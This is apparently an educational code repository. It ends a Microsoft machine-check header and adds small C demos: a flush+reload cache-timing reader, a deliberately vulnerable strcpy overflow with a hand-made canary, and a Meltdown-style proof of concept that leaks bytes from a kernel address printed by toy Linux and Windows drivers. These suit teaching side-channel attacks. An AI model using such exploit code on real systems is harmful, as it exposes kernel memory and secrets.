993 | ULONGLONG ResponseBus:3; // 29-27: Response bus
994 | ULONGLONG RequestParitySignalFirstCycle:1; // 30: First cycle of request parity signal
995 | ULONGLONG RequestParitySignalSecondCycle:1; // 31: Second cycle of request parity signal
996 | ULONGLONG Reserved:32; // 63-32: Reserved
997 | } DUMMYSTRUCTNAME;
998 | } ERROR_BUS_SPECIFIC_DATA, *PERROR_BUS_SPECIFIC_DATA;
999 |
1000 | //
1001 | // IA64 ERRORS: Platform ERROR_MEMORY device definitions
1002 | //
1003 | // With reference to the ACPI Memory Device.
1004 | //
1005 |
1006 | #define ERROR_MEMORY_GUID \
1007 | { 0xe429faf2, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1008 |
1009 | typedef union _ERROR_MEMORY_VALID {
1010 | ULONGLONG Valid;
1011 | struct { // Bits
1012 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1013 | ULONGLONG PhysicalAddress:1; // 1: Physical Address valid bit
1014 | ULONGLONG AddressMask:1; // 2: Address Mask bit
1015 | ULONGLONG Node:1; // 3: Node valid bit
1016 | ULONGLONG Card:1; // 4: Card valid bit
1017 | ULONGLONG Module:1; // 5: Module valid bit
1018 | ULONGLONG Bank:1; // 6: Bank valid bit
1019 | ULONGLONG Device:1; // 7: Device valid bit
1020 | ULONGLONG Row:1; // 8: Row valid bit
1021 | ULONGLONG Column:1; // 9: Column valid bit
1022 | ULONGLONG BitPosition:1; // 10: Bit Position valid bit
1023 | ULONGLONG RequestorId:1; // 11: Platform Requester Id valid bit
1024 | ULONGLONG ResponderId:1; // 12: Platform Responder Id valid bit
1025 | ULONGLONG TargetId:1; // 13: Platform Target Id valid bit
1026 | ULONGLONG BusSpecificData:1; // 14: Platform Bus specific data valid bit
1027 | ULONGLONG OemId:1; // 15: Platform OEM id valid bit
1028 | ULONGLONG OemData:1; // 16: Platform OEM data valid bit
1029 | ULONGLONG Reserved:47; // 63-17: Reserved
1030 | } DUMMYSTRUCTNAME;
1031 | } ERROR_MEMORY_VALID, *PERROR_MEMORY_VALID;
1032 |
1033 | typedef struct _ERROR_MEMORY {
1034 | ERROR_SECTION_HEADER Header;
1035 | ERROR_MEMORY_VALID Valid;
1036 | ERROR_STATUS ErrorStatus; // Memory device error status fields - See ERROR_STATUS defs.
1037 | ULONGLONG PhysicalAddress; // Physical Address of the memory error
1038 | ULONGLONG PhysicalAddressMask; // Valid bits for Physical Address
1039 | USHORT Node; // Node identifier in a multi-node system
1040 | USHORT Card; // Card number of the memory error location
1041 | USHORT Module; // Module number of the memory error location
1042 | USHORT Bank; // Bank number of the memory error location
1043 | USHORT Device; // Device number of the memory error location
1044 | USHORT Row; // Row number of the memory error location
1045 | USHORT Column; // Column number of the memory error location
1046 | USHORT BitPosition; // Bit within the word that is in error
1047 | ULONGLONG RequestorId; // Hardware address of the device or component initiating transaction
1048 | ULONGLONG ResponderId; // Hardware address of the responder to transaction
1049 | ULONGLONG TargetId; // Hardware address of intended target of transaction
1050 | ULONGLONG BusSpecificData; // Bus dependent data of the on-board processor. It is a OEM specific field.
1051 | UCHAR OemId[16]; // OEM defined identification for memory controller
1052 | ERROR_OEM_DATA OemData; // OEM platform specific data.
1053 | } ERROR_MEMORY, *PERROR_MEMORY;
1054 |
1055 | //
1056 | // IA64 ERRORS: Platform ERROR_PCI_BUS device definitions
1057 | //
1058 | // With reference to the PCI Specifications.
1059 | //
1060 |
1061 | #define ERROR_PCI_BUS_GUID \
1062 | { 0xe429faf4, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1063 |
1064 | typedef union _ERROR_PCI_BUS_VALID {
1065 | ULONGLONG Valid;
1066 | struct { // Bits
1067 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1068 | ULONGLONG ErrorType:1; // 1: Error Type valid bit
1069 | ULONGLONG Id:1; // 2: Identifier valid bit
1070 | ULONGLONG Address:1; // 3: Address valid bit
1071 | ULONGLONG Data:1; // 4: Data valid bit
1072 | ULONGLONG CmdType:1; // 5: Command Type valid bit
1073 | ULONGLONG RequestorId:1; // 6: Requester Identifier valid bit
1074 | ULONGLONG ResponderId:1; // 7: Responder Identifier valid bit
1075 | ULONGLONG TargetId:1; // 8: Target Identifier valid bit
1076 | ULONGLONG OemId:1; // 9: OEM Identification valid bit
1077 | ULONGLONG OemData:1; // 10: OEM Data valid bit
1078 | ULONGLONG Reserved:53; // 11-63: Reserved
1079 | } DUMMYSTRUCTNAME;
1080 | } ERROR_PCI_BUS_VALID, *PERROR_PCI_BUS_VALID;
1081 |
1082 | typedef struct _ERROR_PCI_BUS_TYPE {
1083 | UCHAR Type;
1084 | UCHAR Reserved;
1085 | } ERROR_PCI_BUS_TYPE, *PERROR_PCI_BUS_TYPE;
1086 |
1087 | #define PciBusUnknownError ((UCHAR)0)
1088 | #define PciBusDataParityError ((UCHAR)1)
1089 | #define PciBusSystemError ((UCHAR)2)
1090 | #define PciBusMasterAbort ((UCHAR)3)
1091 | #define PciBusTimeOut ((UCHAR)4)
1092 | #define PciMasterDataParityError ((UCHAR)5)
1093 | #define PciAddressParityError ((UCHAR)6)
1094 | #define PciCommandParityError ((UCHAR)7)
1095 | // PciOtherErrors Reserved
1096 |
1097 | typedef struct _ERROR_PCI_BUS_ID {
1098 | UCHAR BusNumber; // Bus Number
1099 | UCHAR SegmentNumber; // Segment Number
1100 | } ERROR_PCI_BUS_ID, *PERROR_PCI_BUS_ID;
1101 |
1102 | typedef struct _ERROR_PCI_BUS {
1103 | ERROR_SECTION_HEADER Header;
1104 | ERROR_PCI_BUS_VALID Valid;
1105 | ERROR_STATUS ErrorStatus; // PCI Bus Error Status - See ERROR_STATUS definitions.
1106 | ERROR_PCI_BUS_TYPE Type; // PCI Bus Error Type
1107 | ERROR_PCI_BUS_ID Id; // PCI Bus Identifier
1108 | UCHAR Reserved[4]; // Reserved
1109 | ULONGLONG Address; // Memory or IO Address on the PCI bus at
1110 | // the time of the event
1111 | ULONGLONG Data; // Data on the PCI bus at time of the event
1112 | ULONGLONG CmdType; // Bus Command or Operation at time of the event
1113 | ULONGLONG RequestorId; // Bus Requester Identifier at time of the event
1114 | ULONGLONG ResponderId; // Bus Responder Identifier at time of the event
1115 | ULONGLONG TargetId; // Intended Bus Target Identifier at time of the event
1116 | UCHAR OemId[16]; // OEM defined identification for pci bus
1117 | ERROR_OEM_DATA OemData; // OEM specific data.
1118 | } ERROR_PCI_BUS, *PERROR_PCI_BUS;
1119 |
1120 | //
1121 | // IA64 ERRORS: Platform ERROR_PCI_COMPONENT device definitions
1122 | //
1123 | // With reference to the PCI Specifications.
1124 | //
1125 |
1126 | #define ERROR_PCI_COMPONENT_GUID \
1127 | { 0xe429faf6, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1128 |
1129 | typedef union _ERROR_PCI_COMPONENT_VALID {
1130 | ULONGLONG Valid;
1131 | struct { // Bits:
1132 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1133 | ULONGLONG Info:1; // 1: Information valid bit
1134 | ULONGLONG MemoryMappedRegistersPairs:1; // 2: Number of Memory Mapped Registers Pairs valid bit
1135 | ULONGLONG ProgrammedIORegistersPairs:1; // 3: Number of Programmed IO Registers Pairs valid bit
1136 | ULONGLONG RegistersDataPairs:1; // 4: Memory Mapped Registers Pairs valid bit
1137 | ULONGLONG OemData:1; // 5: OEM Data valid bit.
1138 | ULONGLONG Reserved:58; // 63-6: Reserved
1139 | } DUMMYSTRUCTNAME;
1140 | } ERROR_PCI_COMPONENT_VALID, *PERROR_PCI_COMPONENT_VALID;
1141 |
1142 | typedef struct _ERROR_PCI_COMPONENT_INFO { // Bytes:
1143 | USHORT VendorId; // 0-1: Vendor Identifier
1144 | USHORT DeviceId; // 2-3: Device Identifier
1145 | UCHAR ClassCodeInterface; // 4: Class Code.Interface field
1146 | UCHAR ClassCodeSubClass; // 5: Class Code.SubClass field
1147 | UCHAR ClassCodeBaseClass; // 6: Class Code.BaseClass field
1148 | UCHAR FunctionNumber; // 7: Function Number
1149 | UCHAR DeviceNumber; // 8: Device Number
1150 | UCHAR BusNumber; // 9: Bus Number
1151 | UCHAR SegmentNumber; // 10: Segment Number
1152 | UCHAR Reserved0;
1153 | ULONG Reserved1;
1154 | } ERROR_PCI_COMPONENT_INFO, *PERROR_PCI_COMPONENT_INFO;
1155 |
1156 | typedef struct _ERROR_PCI_COMPONENT {
1157 | ERROR_SECTION_HEADER Header;
1158 | ERROR_PCI_COMPONENT_VALID Valid;
1159 | ERROR_STATUS ErrorStatus; // Component Error Status
1160 | ERROR_PCI_COMPONENT_INFO Info; // Component Information
1161 | ULONG MemoryMappedRegistersPairs; // Number of Memory Mapped Registers Pairs
1162 | ULONG ProgrammedIORegistersPairs; // Number of Programmed IO Registers Pairs
1163 | #if 0
1164 | ULONGLONG RegistersPairs[/* 2 * (MemoryMappedRegistersPairs + ProgrammedIORegistersPairs) */];
1165 | ERROR_OEM_DATA OemData;
1166 | #endif // 0
1167 | } ERROR_PCI_COMPONENT, *PERROR_PCI_COMPONENT;
1168 |
1169 | //
1170 | // IA64 ERRORS: Platform ERROR_SYSTEM_EVENT_LOG device definitions
1171 | //
1172 | // With reference to the IPMI System Event Log.
1173 | //
1174 |
1175 | #define ERROR_SYSTEM_EVENT_LOG_GUID \
1176 | { 0xe429faf3, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1177 |
1178 | typedef union _ERROR_SYSTEM_EVENT_LOG_VALID {
1179 | ULONGLONG Valid;
1180 | struct { // Bits
1181 | ULONGLONG RecordId:1; // 0: Record Identifier valid bit
1182 | ULONGLONG RecordType:1; // 1: Record Type valid bit
1183 | ULONGLONG GeneratorId:1; // 2: Generator Identifier valid bit
1184 | ULONGLONG EVMRev:1; // 3: Event Format Revision valid bit
1185 | ULONGLONG SensorType:1; // 4: Sensor Type valid bit
1186 | ULONGLONG SensorNum:1; // 5: Sensor Number valid bit
1187 | ULONGLONG EventDirType:1; // 6: Event Dir valid bit
1188 | ULONGLONG EventData1:1; // 7: Event Data1 valid bit
1189 | ULONGLONG EventData2:1; // 8: Event Data2 valid bit
1190 | ULONGLONG EventData3:1; // 9: Event Data3 valid bit
1191 | ULONGLONG Reserved:54; // 10-63:
1192 | } DUMMYSTRUCTNAME;
1193 | } ERROR_SYSTEM_EVENT_LOG_VALID, *PSYSTEM_EVENT_LOG_VALID;
1194 |
1195 | typedef struct _ERROR_SYSTEM_EVENT_LOG {
1196 | ERROR_SECTION_HEADER Header;
1197 | ERROR_SYSTEM_EVENT_LOG_VALID Valid;
1198 | USHORT RecordId; // Record Identifier used for SEL record access
1199 | UCHAR RecordType; // Record Type:
1200 | // 0x02 - System Event Record
1201 | // 0xC0 - 0xDF OEM time stamped, bytes 8-16 OEM defined
1202 | // 0xE0 - 0xFF OEM non-time stamped, bytes 4-16 OEM defined
1203 | ULONG TimeStamp; // Time stamp of the event log
1204 | USHORT GeneratorId; // Software ID if event was generated by software
1205 | // Byte 1:
1206 | // Bit 0 - set to 1 when using system software
1207 | // Bit 7:1 - 7-bit system ID
1208 | // Byte 2:
1209 | // Bit 1:0 - IPMB device LUN if byte 1 holds subordinate
1210 | // address, 0x0 otherwise
1211 | // Bit 7:2 - Reserved.
1212 | UCHAR EVMRevision; // Error message format version
1213 | UCHAR SensorType; // Sensor Type code of the sensor that generated event
1214 | UCHAR SensorNumber; // Number of the sensor that generated event
1215 | UCHAR EventDir; // Event Dir
1216 | // Bit 7 - 0: asserted, 1: desasserted
1217 | // Event Type
1218 | // Bit 6:0 - Event Type code
1219 | UCHAR Data1; // Event data field
1220 | UCHAR Data2; // Event data field
1221 | UCHAR Data3; // Event data field
1222 | } ERROR_SYSTEM_EVENT_LOG, *PERROR_SYSTEM_EVENT_LOG;
1223 |
1224 | //
1225 | // IA64 ERRORS: Platform ERROR_SMBIOS device definitions
1226 | //
1227 | // With reference to the SMBIOS Specifications.
1228 | //
1229 |
1230 | #define ERROR_SMBIOS_GUID \
1231 | { 0xe429faf5, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1232 |
1233 | typedef union _ERROR_SMBIOS_VALID {
1234 | ULONGLONG Valid;
1235 | struct { // Bits
1236 | ULONGLONG EventType:1; // 0: Event Type valid bit
1237 | ULONGLONG Length:1; // 1: Length valid bit
1238 | ULONGLONG TimeStamp:1; // 2: Time Stamp valid bit
1239 | ULONGLONG OemData:1; // 3: Data valid bit
1240 | ULONGLONG Reserved:60; // 4-63:
1241 | } DUMMYSTRUCTNAME;
1242 | } ERROR_SMBIOS_VALID, *PERROR_SMBIOS_VALID;
1243 |
1244 | //
1245 | // ERROR_SMBIOS.Type definitions
1246 | //
1247 |
1248 | typedef UCHAR ERROR_SMBIOS_EVENT_TYPE, *PERROR_SMBIOS_EVENT_TYPE;
1249 | // enum values defined in SMBIOS 2.3 - 3.3.16.6.1
1250 |
1251 | typedef struct _ERROR_SMBIOS {
1252 | ERROR_SECTION_HEADER Header;
1253 | ERROR_SMBIOS_VALID Valid;
1254 | ERROR_SMBIOS_EVENT_TYPE EventType; // Event Type
1255 | UCHAR Length; // Length of the error information in bytes
1256 | ERROR_TIMESTAMP TimeStamp; // Event Time Stamp
1257 | ERROR_OEM_DATA OemData; // Optional data validated by SMBIOS.Valid.Data.
1258 | } ERROR_SMBIOS, *PERROR_SMBIOS;
1259 |
1260 | //
1261 | // IA64 ERRORS: Platform Specific error device definitions
1262 | //
1263 |
1264 | #define ERROR_PLATFORM_SPECIFIC_GUID \
1265 | { 0xe429faf7, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1266 |
1267 | typedef union _ERROR_PLATFORM_SPECIFIC_VALID {
1268 | ULONGLONG Valid;
1269 | struct { // Bits:
1270 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1271 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit
1272 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit
1273 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit
1274 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit
1275 | ULONGLONG OemId:1; // 5: OEM Identification valid bit
1276 | ULONGLONG OemData:1; // 6: OEM Data valid bit
1277 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit
1278 | ULONGLONG Reserved:56; // 63-8: Reserved
1279 | } DUMMYSTRUCTNAME;
1280 | } ERROR_PLATFORM_SPECIFIC_VALID, *PERROR_PLATFORM_SPECIFIC_VALID;
1281 |
1282 | typedef struct _ERROR_PLATFORM_SPECIFIC {
1283 | ERROR_SECTION_HEADER Header;
1284 | ERROR_PLATFORM_SPECIFIC_VALID Valid;
1285 | ERROR_STATUS ErrorStatus; // Platform Generic Error Status
1286 | ULONGLONG RequestorId; // Bus Requester ID at the time of the event
1287 | ULONGLONG ResponderId; // Bus Responder ID at the time of the event
1288 | ULONGLONG TargetId; // Bus intended Target ID at the time of the event
1289 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data
1290 | UCHAR OemId[16]; // OEM specific data for bus identification
1291 | ERROR_OEM_DATA OemData; // OEM specific data
1292 | #if 0
1293 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path.
1294 | #endif // 0
1295 | } ERROR_PLATFORM_SPECIFIC, *PERROR_PLATFORM_SPECIFIC;
1296 |
1297 | //
1298 | // IA64 ERRORS: Platform Bus error device definitions
1299 | //
1300 |
1301 | #define ERROR_PLATFORM_BUS_GUID \
1302 | { 0xe429faf9, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1303 |
1304 | typedef union _ERROR_PLATFORM_BUS_VALID {
1305 | ULONGLONG Valid;
1306 | struct { // Bits:
1307 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1308 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit
1309 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit
1310 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit
1311 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit
1312 | ULONGLONG OemId:1; // 5: OEM Identification valid bit
1313 | ULONGLONG OemData:1; // 6: OEM Data valid bit
1314 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit
1315 | ULONGLONG Reserved:56; // 63-8: Reserved
1316 | } DUMMYSTRUCTNAME;
1317 | } ERROR_PLATFORM_BUS_VALID, *PERROR_PLATFORM_BUS_VALID;
1318 |
1319 | typedef struct _ERROR_PLATFORM_BUS {
1320 | ERROR_SECTION_HEADER Header;
1321 | ERROR_PLATFORM_BUS_VALID Valid;
1322 | ERROR_STATUS ErrorStatus; // Bus Error Status
1323 | ULONGLONG RequestorId; // Bus Requester ID at the time of the event
1324 | ULONGLONG ResponderId; // Bus Responder ID at the time of the event
1325 | ULONGLONG TargetId; // Bus intended Target ID at the time of the event
1326 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data
1327 | UCHAR OemId[16]; // OEM specific data for bus identification
1328 | ERROR_OEM_DATA OemData; // OEM specific data
1329 | #if 0
1330 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path.
1331 | #endif // 0
1332 | } ERROR_PLATFORM_BUS, *PERROR_PLATFORM_BUS;
1333 |
1334 | //
1335 | // IA64 ERRORS: Platform Host Controller error device definitions
1336 | //
1337 |
1338 | #define ERROR_PLATFORM_HOST_CONTROLLER_GUID \
1339 | { 0xe429faf8, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1340 |
1341 |
1342 | typedef union _ERROR_PLATFORM_HOST_CONTROLLER_VALID {
1343 | ULONGLONG Valid;
1344 | struct { // Bits:
1345 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1346 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit
1347 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit
1348 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit
1349 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit
1350 | ULONGLONG OemId:1; // 5: OEM Identification valid bit
1351 | ULONGLONG OemData:1; // 6: OEM Data valid bit
1352 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit
1353 | ULONGLONG Reserved:56; // 63-8: Reserved
1354 | } DUMMYSTRUCTNAME;
1355 | } ERROR_PLATFORM_HOST_CONTROLLER_VALID, *PERROR_PLATFORM_HOST_CONTROLLER_VALID;
1356 |
1357 | typedef struct _ERROR_PLATFORM_HOST_CONTROLLER {
1358 | ERROR_SECTION_HEADER Header;
1359 | ERROR_PCI_COMPONENT_VALID Valid;
1360 | ERROR_STATUS ErrorStatus; // Host Controller Error Status
1361 | ULONGLONG RequestorId; // Host controller Requester ID at the time of the event
1362 | ULONGLONG ResponderId; // Host controller Responder ID at the time of the event
1363 | ULONGLONG TargetId; // Host controller intended Target ID at the time of the event
1364 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data
1365 | UCHAR OemId[16]; // OEM specific data for bus identification
1366 | ERROR_OEM_DATA OemData; // OEM specific data
1367 | #if 0
1368 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path.
1369 | #endif // 0
1370 | } ERROR_PLATFORM_HOST_CONTROLLER, *PERROR_PLATFORM_HOST_CONTROLLER;
1371 |
1372 | //
1373 | // IA64 ERROR_LOGRECORDS definitions
1374 | //
1375 | // MCA_EXCEPTION,
1376 | // CMC_EXCEPTION,
1377 | // CPE_EXCEPTION.
1378 | //
1379 |
1380 | // For compatibility with previous versions of the definitions:
1381 | typedef ERROR_RECORD_HEADER ERROR_LOGRECORD, *PERROR_LOGRECORD;
1382 |
1383 | typedef ERROR_RECORD_HEADER MCA_EXCEPTION, *PMCA_EXCEPTION; // Machine Check Abort
1384 | typedef ERROR_RECORD_HEADER CMC_EXCEPTION, *PCMC_EXCEPTION; // Corrected Machine Check
1385 | typedef ERROR_RECORD_HEADER CPE_EXCEPTION, *PCPE_EXCEPTION; // Corrected Platform Error
1386 | #if (NTDDI_VERSION > NTDDI_WINXP)
1387 | typedef ERROR_RECORD_HEADER INIT_EXCEPTION, *PINIT_EXCEPTION; // Init Event
1388 | #endif
1389 |
1390 | #endif // _IA64_
1391 |
1392 | #elif defined(_ARM_) || defined(_ARM64_)
1393 |
1394 | // _ARM_WORKITEM_ MCE support
1395 |
1396 | typedef struct _MCA_EXCEPTION {
1397 |
1398 | ULONG Dummy;
1399 | } MCA_EXCEPTION, *PMCA_EXCEPTION;
1400 |
1401 | #endif // defined(_X86_) || defined(_IA64_) || defined(_AMD64_)
1402 |
1403 | #if _MSC_VER >= 1200
1404 | #pragma warning(pop)
1405 | #endif
1406 |
1407 | #endif // _MCE_
1408 |
1409 |
1410 |
--------------------------------------------------------------------------------
/source/bsod/ntoskrnl.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/bsod/ntoskrnl.lib
--------------------------------------------------------------------------------
/source/cache.c:
--------------------------------------------------------------------------------
1 | //Build from Visual Studio command prompt: cl.exe cache.c
2 | //Build with GCC: gcc cache.c
3 |
4 | #ifdef _MSC_VER
5 | #include
6 | #else
7 | #include
8 | #endif
9 | #include
10 | #include
11 | #include
12 |
13 | #define PAGE_SIZE (1024 * 4)
14 | #define MAX_VALUE 256
15 | #define CACHE_HIT_THRESHOLD 100
16 |
17 | static uint8_t mem_pages[MAX_VALUE][PAGE_SIZE];
18 |
19 | int get_access_time(uint8_t* page)
20 | {
21 | unsigned long long tick1, tick2;
22 | unsigned int aux;
23 |
24 | tick1 = __rdtscp(&aux);
25 | uint8_t tmp = *page;
26 | tick2 = __rdtscp(&aux);
27 |
28 | return (tick2 - tick1);
29 | }
30 |
31 | uint8_t detect_memory_quick(uint8_t* address)
32 | {
33 | //move all pages out of cache
34 | for (int i = 0; i < MAX_VALUE; i++)
35 | {
36 | _mm_clflush(mem_pages[i]);
37 | }
38 |
39 | //move 1 page into cache
40 | uint8_t index = *address;
41 | uint8_t temp = mem_pages[index][0];
42 |
43 | //find the pages which in cache. Order is lightly mixed up to prevent stride prediction
44 | for (int i = 0; i < MAX_VALUE; i++)
45 | {
46 | int mix_i = ((i * 167) + 13) & 255;
47 | if (get_access_time(mem_pages[mix_i]) < CACHE_HIT_THRESHOLD)
48 | {
49 | return mix_i;
50 | }
51 | }
52 |
53 | return '?';
54 | }
55 |
56 | uint8_t detect_memory_slow(uint8_t* address)
57 | {
58 | //move all pages out of cache
59 | for (int i = 0; i < MAX_VALUE; i++)
60 | {
61 | _mm_clflush(mem_pages[i]);
62 | }
63 |
64 | //move 1 page into cache
65 | uint8_t index = *(uint8_t*)address;
66 | uint8_t tmp = mem_pages[index][0];
67 |
68 | //find the pages which in cache. Order is lightly mixed up to prevent stride prediction
69 | int ret = '?';
70 | int min_time = 10000000;
71 | for (int i = 0; i < MAX_VALUE; i++)
72 | {
73 | int mixed_i = ((i * 167) + 13) & 255;
74 | int access_time = get_access_time(mem_pages[mixed_i]);
75 | if (min_time > access_time)
76 | {
77 | min_time = access_time;
78 | ret = mixed_i;
79 | }
80 | }
81 |
82 | return ret;
83 | }
84 |
85 | char data[] = "password";
86 |
87 | int main()
88 | {
89 | memset(mem_pages, 1, sizeof(mem_pages));
90 |
91 | printf("The data: ");
92 | for (int i = 0; i < strlen(data); i++)
93 | {
94 | printf("%c", detect_memory_quick((uint8_t*)&data[i]));
95 | }
96 | printf("\n");
97 |
98 | printf("The data: ");
99 | for (int i = 0; i < strlen(data); i++)
100 | {
101 | printf("%c", detect_memory_slow((uint8_t*)&data[i]));
102 | }
103 | printf("\n");
104 | }
105 |
--------------------------------------------------------------------------------
/source/canary.c:
--------------------------------------------------------------------------------
1 | // gcc -fstack-protector canary.c
2 | // ./a.out 12345678901234
3 | // ./a.out 123456789012345
4 | // ./a.out 1234567890123456789012345
5 |
6 | #include
7 | #include
8 | #include
9 |
10 | #define CANARY_VALUE 0xFE
11 |
12 | // Function to simulate a vulnerable function with a canary
13 | void vulnerableFunction(char *input) {
14 | // Set up a canary value
15 | char buffer[16];
16 | buffer[15] = CANARY_VALUE;
17 |
18 | // Simulate an unsafe copy which might cause buffer overflow
19 | strcpy(buffer, input);
20 |
21 | // Check if the canary value has been altered
22 | if (buffer[15] != (char)CANARY_VALUE) {
23 | printf("Stack smashing detected! Program will terminate.\n");
24 | } else {
25 | printf("No overflow detected. Function executed safely.\n");
26 | }
27 | }
28 |
29 | int main(int argc, char *argv[]) {
30 | if (argc < 2) {
31 | printf("Usage: %s \n", argv[0]);
32 | return 1;
33 | }
34 |
35 | // Call the vulnerable function with user input
36 | vulnerableFunction(argv[1]);
37 |
38 | return 0;
39 | }
40 |
--------------------------------------------------------------------------------
/source/meltdown/linuxDriver/Makefile:
--------------------------------------------------------------------------------
1 | obj-m += kernelDriver.o
2 |
3 | all:
4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
5 |
6 | clean:
7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
8 |
--------------------------------------------------------------------------------
/source/meltdown/linuxDriver/kernelDriver.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | #define DRIVER_AUTHOR "Your Name "
6 | #define DRIVER_DESC "A simple module to print a kernel variable's address"
7 |
8 | // Initialization function
9 | static int __init hello_init(void) {
10 | static unsigned char secret = 137;
11 | printk(KERN_INFO "Hello, World!\n");
12 | printk(KERN_INFO "Address of the secret: %p\n", (void *)&secret);
13 | return 0; // Non-zero return means that the module couldn't be loaded.
14 | }
15 |
16 | // Exit function
17 | static void __exit hello_exit(void) {
18 | printk(KERN_INFO "Goodbye, World!\n");
19 | }
20 |
21 | // Macros for registering module entry and exit points
22 | module_init(hello_init);
23 | module_exit(hello_exit);
24 |
25 | MODULE_LICENSE("GPL");
26 | MODULE_AUTHOR(DRIVER_AUTHOR);
27 | MODULE_DESCRIPTION(DRIVER_DESC);
28 | MODULE_VERSION("0.1");
29 |
--------------------------------------------------------------------------------
/source/meltdown/meltdown.c:
--------------------------------------------------------------------------------
1 | //Build from Visual Studio command prompt: cl.exe meltdown.c
2 | //Build with GCC: gcc meltdown.c
3 |
4 | #ifdef _MSC_VER
5 | #include
6 | #else
7 | #include
8 | #endif
9 | #include
10 | #include
11 |
12 | #define PAGE_SIZE (1024 * 4)
13 | #define PAGE_NUM 256
14 | #define CACHE_HIT_THRESHOLD 100
15 |
16 | int get_access_time(uint8_t* page)
17 | {
18 | unsigned long long tick1, tick2;
19 | unsigned int aux;
20 |
21 | tick1 = __rdtscp(&aux);
22 | uint8_t tmp = *page;
23 | tick2 = __rdtscp(&aux);
24 |
25 | return (tick2 - tick1);
26 | }
27 |
28 | uint8_t mem_pages[PAGE_NUM][PAGE_SIZE];
29 |
30 | int detect_cached_page()
31 | {
32 | //find the pages which in cache. Order is lightly mixed up to prevent stride prediction
33 | for (int i = 0; i < PAGE_NUM; i++)
34 | {
35 | uint8_t mix_i = ((i * 167) + 13) & 255;
36 | if (get_access_time(mem_pages[mix_i]) < CACHE_HIT_THRESHOLD)
37 | {
38 | return mix_i;
39 | }
40 | }
41 |
42 | return -1;
43 | }
44 |
45 | uint8_t* get_input()
46 | {
47 | uint8_t* target_address;
48 | printf("Input the target address in hexadecimal: ");
49 | scanf("%llx", &target_address);
50 | return target_address;
51 | }
52 |
53 | int main()
54 | {
55 | static uint8_t tmp = 37;
56 | uint8_t* target_address = get_input();
57 | printf("Target Address = %p\n", target_address);
58 |
59 | memset(mem_pages, 1, sizeof(mem_pages));
60 | for(int i = 0; i < 30; i++)
61 | {
62 | _mm_clflush(&tmp);
63 | for (int i = 0; i < PAGE_NUM; i++)
64 | {
65 | _mm_clflush(mem_pages[i]);
66 | }
67 |
68 | if(tmp == 0)
69 | {
70 | tmp = mem_pages[*target_address][0];
71 | }
72 |
73 | int cached_page = detect_cached_page();
74 | printf("Guess the data = %d, %c\n", cached_page, cached_page);
75 | }
76 | }
77 |
--------------------------------------------------------------------------------
/source/meltdown/winDriver/kernelDriver.c:
--------------------------------------------------------------------------------
1 | //cl.exe .\kernelDriver.c ntoskrnl.lib /I .\ /link /out:kernelDriver.sys /subsystem:native /driver:wdm -entry:DriverEntry
2 |
3 | //sc create abuDriver binpath=%cd%\kernelDriver.sys type=kernel
4 | //sc start abuDriver
5 | //sc stop abuDriver
6 | //sc delete abuDriver
7 |
8 | #define _AMD64_
9 | #include "wdm.h"
10 |
11 | const char* secret = "Hello AbuCoding";
12 |
13 | NTSTATUS DriverEntry(void* a, void* b)
14 | {
15 | DbgPrint("%p, %s", secret, secret);
16 | }
17 |
--------------------------------------------------------------------------------
/source/meltdown/winDriver/kernelDriver.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/meltdown/winDriver/kernelDriver.sys
--------------------------------------------------------------------------------
/source/meltdown/winDriver/mce.h:
--------------------------------------------------------------------------------
1 | /*++ BUILD Version: 0011 // Increment this if a change has global effects
2 |
3 | Copyright (c) 1991-2001 Microsoft Corporation
4 |
5 | Module Name:
